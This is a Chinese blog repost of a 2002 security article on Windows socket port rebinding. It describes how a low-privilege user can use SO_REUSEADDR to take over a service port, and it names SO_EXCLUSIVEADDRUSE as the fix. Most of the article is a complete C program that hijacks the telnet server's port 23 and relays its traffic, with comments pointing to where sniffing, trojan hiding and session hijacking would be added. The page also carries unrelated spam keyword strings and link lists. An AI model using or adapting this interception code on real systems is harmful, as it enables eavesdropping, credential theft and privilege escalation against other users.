青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

公告

<2006年8月>
303112345
6789101112
13141516171819
20212223242526
272829303112
3456789

統計

  • 隨筆 - 9
  • 文章 - 13
  • 評論 - 3
  • 引用 - 0

常用鏈接

留言簿(1)

隨筆分類

隨筆檔案

文章分類

文章檔案

搜索

  •  

最新評論

閱讀排行榜

評論排行榜

端口截聽
創建時間:2002-11-05
文章屬性:原創
文章提交:flashsky (flashsky1_at_sina.com)

作者:FLASHSKY
EMAIL:flashsky@xfocus.org
站點:www.xfocus.net??www.shopsky.com
轉載請注明原作者安全焦點

在WINDOWS的SOCKET服務器應用的編程中,如下的語句或許比比都是:
?????? s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
?????? saddr.sin_family = AF_INET;
?????? saddr.sin_addr.s_addr = htonl(INADDR_ANY);
?????? bind(s,(SOCKADDR *)&saddr,sizeof(saddr));
????其實這當中存在在非常大的安全隱患,因為在winsock的實現中,對于服務器的綁定是可以多重綁定的,在確定多重綁定使用誰的時候,根據一條原則是誰的指定最明確則將包遞交給誰,而且沒有權限之分,也就是說低級權限的用戶是可以重綁定在高級權限如服務啟動的端口上的,這是非常重大的一個安全隱患。
????這意味著什么?意味著可以進行如下的攻擊:
????1。一個木馬綁定到一個已經合法存在的端口上進行端口的隱藏,他通過自己特定的包格式判斷是不是自己的包,如果是自己處理,如果不是通過127.0.0.1的地址交給真正的服務器應用進行處理。
????2。一個木馬可以在低權限用戶上綁定高權限的服務應用的端口,進行該處理信息的嗅探,本來在一個主機上監聽一個SOCKET的通訊需要具備非常高的權限要求,但其實利用SOCKET重綁定,你可以輕易的監聽具備這種SOCKET編程漏洞的通訊,而無須采用什么掛接,鉤子或低層的驅動技術(這些都需要具備管理員權限才能達到)
????3。針對一些的特殊應用,可以發起中間人攻擊,從低權限用戶上獲得信息或事實欺騙,如在guest權限下攔截telnet服務器的23端口,如果是采用NTLM加密認證,雖然你無法通過嗅探直接獲取密碼,但一旦有admin用戶通過你登陸以后,你的應用就完全可以發起中間人攻擊,扮演這個登陸的用戶通過SOCKET發送高權限的命令,到達入侵的目的。
????4.對于構建的WEB服務器,入侵者只需要獲得低級的權限,就可以完全達到更改網頁目的,很簡單,扮演你的服務器給予連接請求以其他信息的應答,甚至是基于電子商務上的欺騙,獲取非法的數據。

????其實,MS自己的很多服務的SOCKET編程都存在這樣的問題,telnet,ftp,http的服務實現全部都可以利用這種方法進行攻擊,在低權限用戶上實現對SYSTEM應用的截聽。包括W2K+SP3的IIS也都一樣,那么如果你已經可以以低權限用戶入侵或木馬植入的話,而且對方又開啟了這些服務的話,那就不妨一試。并且我估計還有很多第三方的服務也大多存在這個漏洞。
????解決的方法很簡單,在編寫如上應用的時候,綁定前需要使用setsockopt指定SO_EXCLUSIVEADDRUSE要求獨占所有的端口地址,而不允許復用。這樣其他人就無法復用這個端口了。
????下面就是一個簡單的截聽ms telnet服務器的例子,在GUEST用戶下都能成功進行截聽,剩余的就是大家根據自己的需要,進行一些特殊剪裁的問題了:如是隱藏,嗅探數據,高權限用戶欺騙等。

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

DWORD WINAPI ClientThread(LPVOID lpParam);

int main()
{
????WORD wVersionRequested;
????DWORD ret;
????WSADATA wsaData;
????BOOL val;
????SOCKADDR_IN saddr;
????SOCKADDR_IN scaddr;
????int err;
????SOCKET s;
????SOCKET sc;
????int caddsize;
????HANDLE mt;
????DWORD tid;

????wVersionRequested = MAKEWORD( 2, 2 );
????err = WSAStartup( wVersionRequested, &wsaData );
????if ( err != 0 ) {
????????printf("error!WSAStartup failed!\n");
????????return -1;
????}
????saddr.sin_family = AF_INET;

????//截聽雖然也可以將地址指定為INADDR_ANY,但是要不能影響正常應用情況下,應該指定具體的IP,留下127.0.0.1給正常的服務應用,然后利用這個地址進行轉發,就可以不影響對方正常應用了
????saddr.sin_addr.s_addr = inet_addr("192.168.0.60"); ????
????saddr.sin_port = htons(23);
????if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
????{
????????printf("error!socket failed!\n");
????????return -1;
????}
????val = TRUE;
????//SO_REUSEADDR選項就是可以實現端口重綁定的
????if(setsockopt(s,SOL_SOCKET,SO_REUSEADDR,(char *)&val,sizeof(val))!=0)
????{
????????printf("error!setsockopt failed!\n");
????????return -1;
????}
????//如果指定了SO_EXCLUSIVEADDRUSE,就不會綁定成功,返回無權限的錯誤代碼;
????//如果是想通過重利用端口達到隱藏的目的,就可以動態的測試當前已綁定的端口哪個可以成功,就說明具備這個漏洞,然后動態利用端口使得更隱蔽
????//其實UDP端口一樣可以這樣重綁定利用,這兒主要是以TELNET服務為例子進行攻擊
????if(bind(s,(SOCKADDR *)&saddr,sizeof(saddr))==SOCKET_ERROR)
????{
????????ret=GetLastError();
????????printf("error!bind failed!\n");
????????return -1;
????}
????listen(s,2);????
????while(1)
????{
????????caddsize = sizeof(scaddr);
????????//接受連接請求
????????sc = accept(s,(struct sockaddr *)&scaddr,&caddsize);
????????if(sc!=INVALID_SOCKET)
????????{
????????????mt = CreateThread(NULL,0,ClientThread,(LPVOID)sc,0,&tid);
????????????if(mt==NULL)
????????????{
????????????????printf("Thread Creat Failed!\n");
????????????????break;
????????????}
????????}
????????CloseHandle(mt);
????}
????closesocket(s);
????WSACleanup();
????return 0;
}

DWORD WINAPI ClientThread(LPVOID lpParam)
{
????SOCKET ss = (SOCKET)lpParam;
????SOCKET sc;
????unsigned char buf[4096];
????SOCKADDR_IN saddr;
????long num;
????DWORD val;
????DWORD ret;
????//如果是隱藏端口應用的話,可以在此處加一些判斷
????//如果是自己的包,就可以進行一些特殊處理,不是的話通過127.0.0.1進行轉發

????saddr.sin_family = AF_INET;
????saddr.sin_addr.s_addr = inet_addr("127.0.0.1");
????saddr.sin_port = htons(23);
????if((sc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
????{
????????printf("error!socket failed!\n");
????????return -1;
????}
????val = 100;
????if(setsockopt(sc,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
????{
????????ret = GetLastError();
????????return -1;
????}
????if(setsockopt(ss,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
????{
????????ret = GetLastError();
????????return -1;
????}
????if(connect(sc,(SOCKADDR *)&saddr,sizeof(saddr))!=0)
????{
????????printf("error!socket connect failed!\n");
????????closesocket(sc);
????????closesocket(ss);
????????return -1;
????}
????while(1)
????{
????????//下面的代碼主要是實現通過127。0。0。1這個地址把包轉發到真正的應用上,并把應答的包再轉發回去。
????????//如果是嗅探內容的話,可以再此處進行內容分析和記錄
????????????????//如果是攻擊如TELNET服務器,利用其高權限登陸用戶的話,可以分析其登陸用戶,然后利用發送特定的包以劫持的用戶身份執行。
????????num = recv(ss,buf,4096,0);
????????if(num>0)
????????????send(sc,buf,num,0);
????????else if(num==0)
????????????break;
????????num = recv(sc,buf,4096,0);
????????if(num>0)
????????????send(ss,buf,num,0);
????????else if(num==0)
????????????break;
????}
????closesocket(ss);
????closesocket(sc);
????return 0 ;
}

posted on 2006-09-22 15:48 blues 閱讀(169) 評論(0)  編輯 收藏 引用


只有注冊用戶登錄后才能發表評論。
網站導航: 博客園   IT新聞   BlogJava   博問   Chat2DB   管理


青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            亚洲综合精品自拍| 久久蜜臀精品av| 亚洲综合三区| 日韩视频在线一区| 亚洲美女诱惑| 91久久精品日日躁夜夜躁欧美 | 亚洲大片在线| 欧美激情一区二区久久久| 亚洲欧美激情视频| 国产精品亚洲一区二区三区在线| 欧美日韩mp4| 国产精品夫妻自拍| 国产免费亚洲高清| 很黄很黄激情成人| 亚洲国产日韩综合一区| 亚洲国产视频一区| 亚洲天堂成人在线视频| 午夜国产一区| 久热成人在线视频| 亚洲国内欧美| av成人毛片| 久久久噜噜噜久久| 久久精品网址| 久久综合国产精品| 欧美日韩国产一中文字不卡| 国产精品久久综合| 国内久久婷婷综合| 亚洲乱码国产乱码精品精| 亚洲免费在线电影| 蜜臀av性久久久久蜜臀aⅴ| 亚洲国产91色在线| 亚洲欧美国产另类| 欧美精品九九| 国产午夜精品久久久| 日韩午夜免费| 久久久久久久久一区二区| 亚洲国产日韩欧美在线99| 亚洲在线视频| 欧美多人爱爱视频网站| 国产精品亚洲网站| 一区二区三区av| 狂野欧美激情性xxxx欧美| 一区二区三区欧美在线观看| 久久米奇亚洲| 国产一区二区精品久久| 亚洲在线观看免费| 亚洲欧洲一区| 久久99伊人| 欧美日韩在线另类| 亚洲第一中文字幕| 久久九九99| 亚洲欧美视频| 国产精品视频久久一区| 国产精品99久久久久久久女警| 麻豆亚洲精品| 久久精品盗摄| 国内不卡一区二区三区| 欧美亚洲在线| 亚洲在线免费视频| 国产精品一区二区视频| 亚洲欧美日韩区| 亚洲免费电影在线| 欧美激情综合色综合啪啪| 91久久线看在观草草青青| 久热re这里精品视频在线6| 欧美怡红院视频| 国产一二精品视频| 欧美中文在线字幕| 亚洲综合第一| 国产日产欧美精品| 久久精品亚洲一区| 欧美一区二区视频网站| 国产乱码精品1区2区3区| 性欧美大战久久久久久久免费观看 | 久久在线免费观看| 亚洲欧美色一区| 国产一区二区视频在线观看| 久久国产66| 欧美一级二级三级蜜桃| 国产一区二区三区在线播放免费观看 | 亚洲在线一区| 国产欧美日韩视频在线观看 | 亚洲精选中文字幕| 亚洲精品影视| 国产精品毛片高清在线完整版| 欧美自拍丝袜亚洲| 久久精品五月婷婷| 91久久精品一区二区三区| 亚洲国产精品va在线看黑人| 欧美精彩视频一区二区三区| 一区二区三区欧美| 亚洲自拍偷拍麻豆| 又紧又大又爽精品一区二区| 亚洲第一黄色网| 国产精品毛片a∨一区二区三区| 久久国产天堂福利天堂| 久久午夜视频| 99精品视频免费观看视频| 亚洲一区免费网站| 亚洲国产欧美一区| 夜夜嗨av色综合久久久综合网| 国产乱码精品一区二区三| 欧美成人精品高清在线播放| 欧美日韩ab| 噜噜噜噜噜久久久久久91| 欧美日韩国产综合久久| 久久一区二区三区国产精品| 欧美精品九九| 久久婷婷色综合| 欧美日韩国产在线播放| 免费成人黄色| 国产精品日韩欧美| 亚洲国产另类 国产精品国产免费| 国产精品久久久久99| 亚洲第一精品久久忘忧草社区| 国产精品久久久久影院亚瑟| 欧美高清hd18日本| 国产日韩亚洲| 一区二区三区免费在线观看| 亚洲毛片网站| 久久综合狠狠综合久久综青草| 亚洲欧美激情视频| 欧美激情a∨在线视频播放| 久久久xxx| 欧美亚洲成人网| 亚洲精品久久在线| 亚洲国产综合视频在线观看| 久久精品色图| 久久久蜜桃一区二区人| 国产精品狠色婷| 亚洲免费观看高清在线观看| 亚洲国产一区二区精品专区| 久久综合国产精品台湾中文娱乐网| 欧美日韩国产亚洲一区| 牛牛影视久久网| 国产一区二区视频在线观看| 亚洲制服欧美中文字幕中文字幕| 日韩视频一区二区三区在线播放 | 亚洲一区二三| 99国产精品视频免费观看一公开| 久久久久久网址| 久久久久久亚洲综合影院红桃| 欧美午夜不卡在线观看免费 | 久久国产精品久久久久久| 国产精品第十页| 99精品国产热久久91蜜凸| 日韩一区二区精品在线观看| 免费精品视频| 亚洲国产成人久久| 国内精品久久国产| 午夜在线播放视频欧美| 欧美中文字幕视频| 国产一区二区三区四区hd| 欧美一区网站| 快射av在线播放一区| 亚洲成色www久久网站| 久久综合色88| 亚洲人被黑人高潮完整版| 中日韩男男gay无套| 国产精品久久久久久久久免费| 国产精品99久久久久久久vr | 亚洲国产一二三| 欧美激情片在线观看| 一本色道久久综合狠狠躁篇怎么玩| 一区二区精品| 国产精品老女人精品视频| 亚洲欧美在线网| 米奇777超碰欧美日韩亚洲| 亚洲精品国产精品国产自| 欧美精品一区二区三区蜜臀| 在线亚洲一区观看| 久久一区精品| 日韩一区二区精品| 国产手机视频精品| 蜜臀91精品一区二区三区| 亚洲剧情一区二区| 欧美在线欧美在线| 亚洲欧洲在线播放| 国产精品青草综合久久久久99| 久久精品中文字幕一区| 亚洲国产二区| 先锋影音国产精品| 91久久久精品| 国产日韩亚洲欧美精品| 欧美成人中文| 欧美一区二区三区视频在线| 欧美激情在线播放| 欧美亚洲网站| 亚洲人精品午夜在线观看| 国产精品亚洲人在线观看| 欧美成人激情视频| 香蕉久久久久久久av网站| 亚洲国产精品成人va在线观看| 亚洲欧美日韩国产成人| 亚洲精品韩国| 黄色亚洲大片免费在线观看| 国产精品福利片| 免费在线视频一区| 久久频这里精品99香蕉| 一区二区三区免费观看|